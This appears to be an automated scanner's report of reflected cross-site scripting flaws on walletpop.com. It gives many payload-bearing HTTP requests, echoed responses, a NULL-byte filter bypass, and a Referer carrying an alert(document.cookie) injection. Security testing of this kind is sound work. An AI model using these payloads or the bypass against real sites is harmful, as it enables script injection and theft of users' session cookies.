<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/2011%005e480"><script>alert(1)</script>f90657b4a2/02/05/wine-deals-for-valentines-day/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddfc9"><script>alert(1)</script>35f9d45da65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bankingddfc9"><script>alert(1)</script>35f9d45da65 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 967ac"><script>alert(1)</script>960457fed51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /banking967ac"><script>alert(1)</script>960457fed51/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 487c5"><script>alert(1)</script>77f6bcb323f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog487c5"><script>alert(1)</script>77f6bcb323f/category/fantastic-freebies/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0057581"><script>alert(1)</script>e2c8e44a8 was submitted in the REST URL parameter 2. This input was echoed as 57581"><script>alert(1)</script>e2c8e44a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/category%0057581"><script>alert(1)</script>e2c8e44a8/fantastic-freebies/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:23 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999961 Connection: Keep-Alive Content-Type: text/html Content-Length: 35409
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/category%0057581"><script>alert(1)</script>e2c8e44a8/fantastic-freebies/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001721f"><script>alert(1)</script>c3d9b39b93b was submitted in the REST URL parameter 3. This input was echoed as 1721f"><script>alert(1)</script>c3d9b39b93b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/category/fantastic-freebies%001721f"><script>alert(1)</script>c3d9b39b93b/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:25 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999944 Connection: Keep-Alive Content-Type: text/html Content-Length: 35414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/category/fantastic-freebies%001721f"><script>alert(1)</script>c3d9b39b93b/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313c9"><script>alert(1)</script>441d4476175 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog313c9"><script>alert(1)</script>441d4476175/media/awards_promo_bottom.gif HTTP/1.1 Host: www.walletpop.com Proxy-Connection: keep-alive Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066c7b"><script>alert(1)</script>e0aaca04e57 was submitted in the REST URL parameter 2. This input was echoed as 66c7b"><script>alert(1)</script>e0aaca04e57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/media%0066c7b"><script>alert(1)</script>e0aaca04e57/awards_promo_bottom.gif HTTP/1.1 Host: www.walletpop.com Proxy-Connection: keep-alive Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 20:46:21 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Content-Length: 35665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/media%0066c7b"><script>alert(1)</script>e0aaca04e57/awards_promo_bottom.gif/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00695e3"><script>alert(1)</script>a79700beed7 was submitted in the REST URL parameter 3. This input was echoed as 695e3"><script>alert(1)</script>a79700beed7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/media/awards_promo_bottom.gif%00695e3"><script>alert(1)</script>a79700beed7 HTTP/1.1 Host: www.walletpop.com Proxy-Connection: keep-alive Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 20:46:22 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Content-Length: 35672
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/media/awards_promo_bottom.gif%00695e3"><script>alert(1)</script>a79700beed7/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf5ca"><script>alert(1)</script>c7e139e7740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogcf5ca"><script>alert(1)</script>c7e139e7740/media/awards_promo_middle.gif HTTP/1.1 Host: www.walletpop.com Proxy-Connection: keep-alive Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c9a73"><script>alert(1)</script>8a89eb7e578 was submitted in the REST URL parameter 2. This input was echoed as c9a73"><script>alert(1)</script>8a89eb7e578 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/media%00c9a73"><script>alert(1)</script>8a89eb7e578/awards_promo_middle.gif HTTP/1.1 Host: www.walletpop.com Proxy-Connection: keep-alive Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 20:46:21 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Content-Length: 35665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/media%00c9a73"><script>alert(1)</script>8a89eb7e578/awards_promo_middle.gif/"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009fa50"><script>alert(1)</script>1307eefa2d3 was submitted in the REST URL parameter 3. This input was echoed as 9fa50"><script>alert(1)</script>1307eefa2d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /blog/media/awards_promo_middle.gif%009fa50"><script>alert(1)</script>1307eefa2d3 HTTP/1.1 Host: www.walletpop.com Proxy-Connection: keep-alive Referer: http://www.luxist.com/?10976%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E55a7c5f9e2c=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 20:46:22 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html Content-Length: 35671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/blog/media/awards_promo_middle.gif%009fa50"><script>alert(1)</script>1307eefa2d3/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 415c4"><script>alert(1)</script>2692b0d008f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /calculators415c4"><script>alert(1)</script>2692b0d008f HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5cf"><script>alert(1)</script>e9af38db5bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoryce5cf"><script>alert(1)</script>e9af38db5bd/debt/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a7ef"><script>alert(1)</script>8072aa8b091 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/debt8a7ef"><script>alert(1)</script>8072aa8b091/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f27a9"><script>alert(1)</script>5cf2701642a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoryf27a9"><script>alert(1)</script>5cf2701642a/fraud/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d532"><script>alert(1)</script>8ef82b2be4c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fraud9d532"><script>alert(1)</script>8ef82b2be4c/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d9df"><script>alert(1)</script>fedd8cd7bf4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category7d9df"><script>alert(1)</script>fedd8cd7bf4/insurance/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3409d"><script>alert(1)</script>724d3168b2e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/insurance3409d"><script>alert(1)</script>724d3168b2e/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8becd"><script>alert(1)</script>487c03d15bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category8becd"><script>alert(1)</script>487c03d15bc/loans/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eaa0"><script>alert(1)</script>9c89b35ab7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/loans4eaa0"><script>alert(1)</script>9c89b35ab7e/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68873"><script>alert(1)</script>1b433b384e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category68873"><script>alert(1)</script>1b433b384e4/recalls/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47dc3"><script>alert(1)</script>2fe642e4103 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/recalls47dc3"><script>alert(1)</script>2fe642e4103/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbe8a"><script>alert(1)</script>d16c755a7b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categorycbe8a"><script>alert(1)</script>d16c755a7b3/retire/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16521"><script>alert(1)</script>e4074b1b136 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/retire16521"><script>alert(1)</script>e4074b1b136/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84a38"><script>alert(1)</script>d66e5b9f1c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /college-finance84a38"><script>alert(1)</script>d66e5b9f1c3 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 333ea"><script>alert(1)</script>527eaddf0e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /college-finance333ea"><script>alert(1)</script>527eaddf0e4/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 872aa"><script>alert(1)</script>30128d4c378 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /credit872aa"><script>alert(1)</script>30128d4c378 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd1db"><script>alert(1)</script>4be2103e618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /creditdd1db"><script>alert(1)</script>4be2103e618/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18561"><script>alert(1)</script>f173eebd8e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /credit18561"><script>alert(1)</script>f173eebd8e2/credit-cards/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c0df9"><script>alert(1)</script>60b8b2ef72c was submitted in the REST URL parameter 2. This input was echoed as c0df9"><script>alert(1)</script>60b8b2ef72c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /credit/credit-cards%00c0df9"><script>alert(1)</script>60b8b2ef72c/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:21 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999983 Connection: Keep-Alive Content-Type: text/html Content-Length: 35372
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/credit/credit-cards%00c0df9"><script>alert(1)</script>60b8b2ef72c/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aed8"><script>alert(1)</script>cd21321ec8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /crib-recall6aed8"><script>alert(1)</script>cd21321ec8f HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9b23"><script>alert(1)</script>122b8a501aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /debtc9b23"><script>alert(1)</script>122b8a501aa HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e25f0"><script>alert(1)</script>9e613fe56f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /debte25f0"><script>alert(1)</script>9e613fe56f9/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f7a1"><script>alert(1)</script>163ff95afd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fraud8f7a1"><script>alert(1)</script>163ff95afd5 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload badea"><script>alert(1)</script>5dfc2acb606 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insurancebadea"><script>alert(1)</script>5dfc2acb606 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e6a"><script>alert(1)</script>be63be8f6bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insurance18e6a"><script>alert(1)</script>be63be8f6bc/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc16e"><script>alert(1)</script>796a576e51c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /loansfc16e"><script>alert(1)</script>796a576e51c HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26f2b"><script>alert(1)</script>6d2d8ca9cf6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /loans26f2b"><script>alert(1)</script>6d2d8ca9cf6/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
